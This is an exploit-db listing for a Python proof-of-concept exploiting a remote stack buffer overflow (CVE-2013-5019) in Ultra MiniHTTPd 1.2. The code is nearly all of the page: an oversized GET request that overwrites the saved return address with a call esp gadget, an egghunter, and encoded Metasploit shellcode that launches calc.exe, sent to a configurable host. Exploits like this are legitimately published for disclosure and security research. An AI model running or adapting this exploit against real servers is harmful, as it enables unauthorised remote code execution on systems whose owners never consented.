Ultra MiniHTTPd 1.2 – ‘GET’ Remote Stack Buffer Overflow (PoC)

  • 作者: jollymongrel
    日期: 2018-04-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44472/
  • # Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
    # Date: 2018-04-14
    # Exploit Author: jollymongrel
    # Vendor Homepage: http://www.vector.co.jp
    # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
    # Version: 1.2
    # Tested on: Windows 7 32-bit
    # CVE : CVE-2013-5019
    
    import sys
    import socket
    import struct
    
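    # ----------------------------------------------------------------------
    # Return address.  The saved EIP is overwritten with a ``call esp`` gadget
    # from msvcrt.dll as loaded on the tested Windows 7 32-bit host (see the
    # header).  The address is specific to that DLL build: re-locate the
    # gadget before reusing this PoC on any other Windows / patch level.
    # Packed explicitly little-endian ('<I') because the target is x86 no
    # matter what byte order the attacking host has.
    eip = struct.pack('<I', 0x764046cd)  # call esp [msvcrt.dll]

    # ----------------------------------------------------------------------
    # Stage 2: egg tag + shellcode.
    # windows/exec - 274 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # EXITFUNC=thread
    # CMD=calc.exe
    # badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
    # The 4-byte tag, repeated twice ("no0bno0b"), is what the egghunter below
    # scans memory for; the hunter lands on the first byte after the tag.
    egg = b"no0b"
    shellcode = (egg * 2 +
        b"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
        b"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
        b"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
        b"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
        b"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
        b"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
        b"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
        b"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
        b"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
        b"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
        b"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
        b"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
        b"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
        b"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
        b"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
        b"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
        b"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
        b"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
        b"\x9a\x9d\xe2\xd0")

    # ----------------------------------------------------------------------
    # Stage 1: the classic 32-byte int 0x2e egghunter.  It probes each page
    # with a syscall (so unmapped memory does not fault the process), looks
    # for the tag twice in a row (scasd, scasd) and then ``jmp edi`` to the
    # byte right after it.  The ``mov eax, "no0b"`` at offset 17 must match
    # ``egg`` above.
    egghunter = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
                 b"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

    # Offsets the original PoC was tuned against (tested Windows 7 32-bit).
    EGG_OFFSET = 537    # where stage 2 is planted inside the filler
    EIP_OFFSET = 967    # bytes of URI before the saved return address
    TOTAL_LEN = 1007    # request-URI length the PoC sends

    DEFAULT_HOST = "192.168.32.175"
    DEFAULT_PORT = 80
    TIMEOUT = 5.0       # seconds to wait for connect/recv before giving up


    def build_payload():
        """Return the TOTAL_LEN-byte request-URI that overflows the stack.

        Layout (byte offsets):
          0     'A' filler
          537   egg tag + shellcode (found later by the egghunter)
          ...   'A' filler up to the saved return address
          967   eip -> call esp
          971   egghunter; ``call esp`` lands here because after the ``ret``
                ESP points just past the overwritten return address
          1003  a second ``jmp edi`` (redundant - the hunter already ends in
                one - but kept so every offset stays as in the original PoC)
          1005  'C' filler up to TOTAL_LEN

        Raises ValueError if the shellcode no longer fits in front of the
        return address (the original silently produced a broken payload).
        """
        prefix = b"A" * EGG_OFFSET + shellcode
        if len(prefix) > EIP_OFFSET:
            raise ValueError("shellcode too long: %d bytes overrun the return "
                             "address at offset %d" % (len(prefix), EIP_OFFSET))
        stage = b"".join([
            prefix,
            b"A" * (EIP_OFFSET - len(prefix)),
            eip,
            egghunter,
            b"\xff\xe7",  # jmp edi
        ])
        return stage + b"C" * (TOTAL_LEN - len(stage))


    def build_request(payload):
        """Wrap *payload* in the GET request line exactly as the PoC sends it.

        NOTE(review): the original PoC has no space before "HTTP/1.1" -
        possibly because 0x20 is listed as a bad char - and it is kept
        byte-identical here because the offsets above were tuned against this
        exact request.  Confirm against the target's parser if the crash does
        not reproduce.
        """
        return b"GET /" + payload + b"HTTP/1.1\r\n\r\n"


    def _target_from_args(args):
        """Return (host, port) from ``[host [port]]``, falling back to the defaults."""
        host = args[0] if len(args) > 0 else DEFAULT_HOST
        port = int(args[1]) if len(args) > 1 else DEFAULT_PORT
        return host, port


    def main(argv=None):
        """Send the overflow to the target given on the command line.

        Usage: ``python exploit.py [host] [port]``; defaults are the values
        hard-coded in the original PoC.  The socket is always closed, a
        timeout stops the script hanging forever when the service stops
        answering, and the (possibly empty) response is echoed for triage.
        Runs under Python 2.7 and 3 (bytes literals, function-style print).
        """
        args = sys.argv[1:] if argv is None else argv
        host, port = _target_from_args(args)
        payload = build_payload()
        print("[+] sending payload, length %d" % len(payload))

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(TIMEOUT)
        try:
            s.connect((host, port))
            s.sendall(build_request(payload))
            try:
                data = s.recv(1024)
            except socket.timeout:
                # Best effort: no answer within TIMEOUT - report, do not crash.
                print("[*] no response within %.1fs" % TIMEOUT)
                return
            except socket.error as exc:
                # A reset here is typical when the service has died; report it.
                print("[*] recv failed: %s" % exc)
                return
        finally:
            s.close()
        print("[*] received %d bytes" % len(data))


    if __name__ == "__main__":
        main()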